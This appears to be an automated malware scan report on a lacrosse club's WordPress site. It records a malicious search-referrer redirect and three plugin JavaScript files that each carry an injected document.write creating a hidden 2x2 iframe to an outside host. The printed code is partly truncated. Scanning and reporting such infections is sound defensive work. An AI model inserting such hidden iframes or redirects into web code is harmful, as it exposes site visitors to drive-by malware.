Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.glasgowlacrosse.co.uk/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.glasgowlacrosse.co.uk Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Sep 2014 10:41:36 GMT Location: http://mikeritchie.net/showthread.php?sid=84074 Server: nginx Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 Ngpass_all: 1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.glasgowlacrosse.co.uk/ | 200 OK Content-Length: 12495 Content-Type: text/html | clean |
http://code.jquery.com/jquery-latest.min.js?ver=latest | 200 OK Content-Length: 95786 Content-Type: application/x-javascript | clean |
http://www.glasgowlacrosse.co.uk/wp-content/plugins/advanced-spoiler/js/jquery-spoiler.js?ver=2.02 | 200 OK Content-Length: 3179 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spoiler = { timer: 0, setOption: function(options) { var newOptions = Object.extend(options||{}, arguments[1]||{}); return newOptions; }, _start: function() { jQuery('a.spoiler-tgl').each(function(i){ var el = jQuery('#'+jQuery(this).attr('id').replace('_tgl', '')); var opt = jQuery(this).attr('rev').split('||'); this.onclick = function(){Spoiler.plugin(el, jQuery(this), opt); return false;}; if(el.css('display') != 'none') { plugin: function(el, tid, opt){ if (el.css('display') != 'none') { tid.html(opt[1]); } else { tid.html(opt[2]); } tid.toggleClass("collapsed"); Spoiler.toggle(el, opt[0], parseInt(opt[3])); } }; jQuery(document).ready(function() { Spoiler.start(); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=84074 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074> | ||
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js?ver=3.9.2 | 200 OK Content-Length: 200719 Content-Type: text/javascript | clean |
http://www.glasgowlacrosse.co.uk/wp-content/plugins/thethe-tabs-and-accordions/style/js/thethe.toggle.js?ver=3.9.2 | 200 OK Content-Length: 2283 Content-Type: application/javascript | clean |
http://www.glasgowlacrosse.co.uk/wp-content/plugins/thethe-tabs-and-accordions/style/js/thethe.haccordion.js?ver=3.9.2 | 200 OK Content-Length: 5567 Content-Type: application/javascript | clean |
http://www.glasgowlacrosse.co.uk/wp-content/plugins/wordpress-tabs-slides/ts/tabs_slides.js?ver=2.0.1 | 200 OK Content-Length: 8311 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style type="text/css">.jwts_tabber{display:none;}<\/style>'); var pageURL = window.location.toString().slice(0, -1); var urlArray = new Array(); urlArray = pageURL.split('//')[1]; var pageId = urlArray.split('/')[urlArray.split('/').length-1]; var tabberOptions = { 'manualStartup':true, 'cookie':"jwts_tc_"+pageId, 'onLoad': function(argsObj) { var t = argsObj.tabber; var wtsslide = function(wrapper,speed){ jQuery(wrapper).slideToggle(speed); } wtsaccordion = function(group,wrapper,speed){ jQuery(group).hide(); jQuery(wrapper).slideToggle(speed).toggleClass("active"); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=84074 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074> | ||
http://www.glasgowlacrosse.co.uk/wp-content/plugins/wordpress-tabs-slides/ts/tabs_slides_opt_loader.js?ver=2.0.1 | 200 OK Content-Length: 2201 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var DomLoaded = { onload: [], loaded: function() { if (arguments.callee.done) return; arguments.callee.done = true; for (i = 0;i < DomLoaded.onload.length;i++) { if(DomLoaded.onload[i] != undefined){ DomLoaded.onload[i](); } } }, load: function(fireThis) { this.onload.push(fireThis); if (document.addEventListener) document.addEventListener("DOMContentLoaded", DomLoaded.loaded, null); window.onload = func; } else { window.onload = function() { if (oldonload) { oldonload(); } func(); } } } }; DomLoaded.load(function() { tabberAutomatic(tabberOptions); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=84074 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074> | ||
http://www.glasgowlacrosse.co.uk/wp-content/themes/twentyfourteen/js/functions.js?ver=20140319 | 200 OK Content-Length: 3393 Content-Type: application/javascript | clean |
http://www.glasgowlacrosse.co.uk/news/ | 200 OK Content-Length: 35348 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/about/ | 200 OK Content-Length: 17041 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/about/mens-lacrosse/ | 200 OK Content-Length: 21368 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/about/womens-lacrosse/ | 200 OK Content-Length: 18613 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/membership/ | 200 OK Content-Length: 13941 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/calender/ | 200 OK Content-Length: 12728 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=glasgowlacrosse.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://glasgowlacrosse.co.uk/
Result: glasgowlacrosse.co.uk is not infected or malware details are not published yet.
Result: glasgowlacrosse.co.uk is not infected or malware details are not published yet.